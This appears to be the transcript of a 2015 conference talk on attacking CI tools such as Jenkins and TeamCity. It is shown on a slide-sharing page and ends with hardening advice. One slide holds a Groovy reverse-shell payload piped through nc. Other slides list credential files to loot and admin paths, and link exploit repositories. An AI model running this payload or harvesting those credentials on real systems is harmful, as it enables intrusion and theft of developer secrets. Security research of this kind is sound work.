Upgrade to Pro — share decks privately, control downloads, hide ads and more …

S[c*]rum is all around or: How to stop Continuo...

Andrey Plastunov
November 18, 2015
0
17

S[c*]rum is all around or: How to stop Continuous integration

The presentation discusses Continuous integration tools from an attackers point of view

Andrey Plastunov

November 18, 2015
Tweet

More Decks by Andrey Plastunov

See All by Andrey Plastunov
Misusing oop in mvc frameworks. How to conveniently develop broken apps
plastunov
0
22
Simple bugs to pwn the devs
plastunov
0
49

Featured

See All Featured
It's Worth the Effort
3n
182
27k
Pencils Down: Stop Designing & Start Developing
hursman
119
11k
Designing the Hi-DPI Web
ddemaree
278
34k
Gamification - CAS2011
davidbonilla
79
5k
Writing Fast Ruby
sferik
623
60k
RailsConf 2023
tenderlove
28
830
Navigating Team Friction
lara
183
13k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
158
15k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
3
69
What the flash - Photography Introduction
edds
67
11k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
363
22k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
124
18k

Transcript

  1. S[c*]rum is all around or: How to stop Continuous integration

    Andrey Plastunov, Digital Security (dsec.ru)

  2. DEVELOPERS! DEVELOPERS! DEVELOPERS!

  3. or how to stop continuous integration the stories on CI

    systems S[c*]rum is everywhere

  4. Previous works on the subject •  CONTINUOUS INTRUSION: WHY CI

    TOOLS ARE AN ATTACKER’S BEST FRIENDS Nikhil Mittal •  What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability foxglovesecurity

  5. Dev Environment DevEnv

  6. Dev Environment DevEnv: CI Tools

  7. Our targets

  8. Straight and simple Build process

  9. Straight and simple Build process

  10. Straight and simple Build process

  11. Straight and simple Build process

  12. Straight and simple Build process

  13. Straight and simple Build process

  14. Straight and simple Build process

  15. Simplified Role model •  Cannot do anything •  Can view

    projects (including builds) •  Can edit projects (including builds) •  Can perform system-wide actions (like configuration, customizing, run scripts etc)

  16. Simplified CI Architecture

  17. Simplified CI Architecture Master •  Controls the entire system: ◦ 

    Configuration ◦  User accounts ◦  Plugin management •  Builds targets •  Temporary hosts builded apps

  18. Simplified CI Architecture Slaves •  Managed by master •  Build

    targets •  Temporary host builded apps

  19. Simplified CI Architecture User Interface •  Graphical (mostly web-based) interface

    to control Master •  (sometimes) API’s and other such stuff

  20. Simplified CI Architecture Plugins •  Various tools to modify base

    system Such as: ◦  Security plugins ◦  IDE integration plugins ◦  Reporting plugins ◦  Code repos integration plugins ◦  ….

  21. A note on security •  Default configuration isn’t secure at

    all

  22. A note on security •  Default configuration isn’t secure at

    all

  23. A note on security •  Default configuration isn’t secure at

    all

  24. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =(

  25. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =(

  26. Some loot on filesystem •  Jenkins $JENKINS_HOME/ +: ◦  ./secret/*

    ◦  ./workspace/* ◦  ./userContent/* ◦  ./config.xml ◦  ./secret.key ◦  ./credentials.xml ...

  27. Some loot on filesystem •  TeamCity ◦  .BuildServer/config/* ◦  buildAgent/work/*

    $TEAMCITY_HOME/ +: ◦  webapps/ ◦  logs/teamcity-server.log | grep Super

  28. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =( •  Some tiny little bugs

  29. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =( •  Some tiny little bugs

  30. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =( •  Some tiny little bugs

  31. A note on security •  Default configuration isn’t secure at

    all •  Still, proper configuration also will not protect you well =( •  Some tiny little bugs

  32. A note on responsibility •  All the bugs are carefully

    reported to corresponding maintainers •  Maintainers react quite fast

  33. [Un?]typical vectors for abusing CI tools Attack surface

  34. [Un?]typical vectors for abusing CI tools Attack surface 

  35. [Un?]typical vectors for abusing CI tools Attack surface

  36. [Un?]typical vectors for abusing CI tools Attack surface

  37. [Un?]typical vectors for abusing CI tools Attack surface: Plugins

  38. [Un?]typical vectors for abusing CI tools Attack surface: Plugins

  39. [Un?]typical vectors for abusing CI tools Attack surface: Plugins

  40. [Un?]typical vectors for abusing CI tools Attack surface: Plugins

  41. [Un?]typical vectors for abusing CI tools In this Demo I’ll

    cheat a little due to JENKINS-31089 issue

  42. [Un?]typical vectors for abusing CI tools •  Some useful links

    https://github.com/yandex-qatools/juseppe/ - Jenkins custom plugin server •  Some code examples to play with: https://github.com/osakaaa/ZN_CI/plugins •  Groovy payload used in the example: r=Runtime.getRuntime();p = r.exec(["/bin/bash","-c","mknod /tmp/ backpipe p && /bin/sh 0</tmp/backpipe | nc host port 1>/tmp/ backpipe"] as String[]);p.waitFor() Attack surface: Plugins

  43. [Un?]typical vectors for abusing CI tools

  44. [Un?]typical vectors for abusing CI tools •  Obvious ones ◦ 

    Phishing

  45. [Un?]typical vectors for abusing CI tools •  Obvious ones ◦ 

    Phishing ◦  Source code stealing

  46. [Un?]typical vectors for abusing CI tools

  47. [Un?]typical vectors for abusing CI tools •  Obvious ones ◦ 

    Phishing ◦  Source code stealing ◦  Pwning(?)

  48. [Un?]typical vectors for abusing CI tools

  49. [Un?]typical vectors for abusing CI tools •  Some examples of

    code to play with: https://github.com/osakaaa/ZN_CI/POC/

  50. [Un?]typical vectors for abusing CI tools •  Obvious ones ◦ 

    Phishing ◦  Source code stealing ◦  Pwning(?) ◦  Privilege escalation

  51. [Un?]typical vectors for abusing CI tools •  Some useful scripts:

    ◦  Jenkins Unauthenticated Credential Recovery* https://www.exploit-db.com/exploits/38664/ *misconfigured jenkins instances only

  52. [Un?]typical vectors for abusing CI tools

  53. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection

  54. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys)

  55. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys)

  56. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys)

  57. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys)

  58. [Un?]typical vectors for abusing CI tools

  59. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys)

  60. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys) ◦  Botnet? :D

  61. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys) ◦  Botnet? :D

  62. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys) ◦  Botnet? :D

  63. [Un?]typical vectors for abusing CI tools •  Interesting ones ◦ 

    App’s infection ◦  Developer’s identity stealing (private keys) ◦  Botnet? :D

  64. [Un?]typical vectors for abusing CI tools

  65. Some useful paths •  Jenkins: ◦  /script ◦  /credential-store/ ◦ 

    /credentials/ ◦  /signup/ ◦  /view/All/newJob ◦  userContent

  66. Some useful paths •  TeamCity: ◦  /registerUser.html ◦  /guestLogin.html ◦ 

    /admin/admin.html ▪  (may be accessible due to poor configuration) ◦  /admin/editProject.html?projectId=Test ▪  (may be accessible due to poor configuration)

  67. Some useful paths Other interesting stuff •  Java unsafe deserialization

    ◦  Payload generator: https://github.com/frohoff/ysoserial ◦  Exploit: https://github.com/foxglovesec/JavaUnserializeExploits/ blob/master/jenkins.py ◦  My All-in-one compilation: https://github.com/osakaaa/ZN_CI/blob/master/POC/ jenkins_cli.py

  68. Lessons learned CI Tools are gates to Developer’s network. So,

    they must be protected well: •  Never rely on default settings •  Never bind to 0.0.0.0 •  Never rely on safety of 3rd party components like plugins •  Update your CI as soon as a new security advisory is published •  Perform additional validation on uploaded source code before and after build in •  Try to separate projects from each other and from Master (Docker?)

  69. DevEnv: Not only CI tools

  70. OkThxBye @aplastunov @osakaaa @DSecRU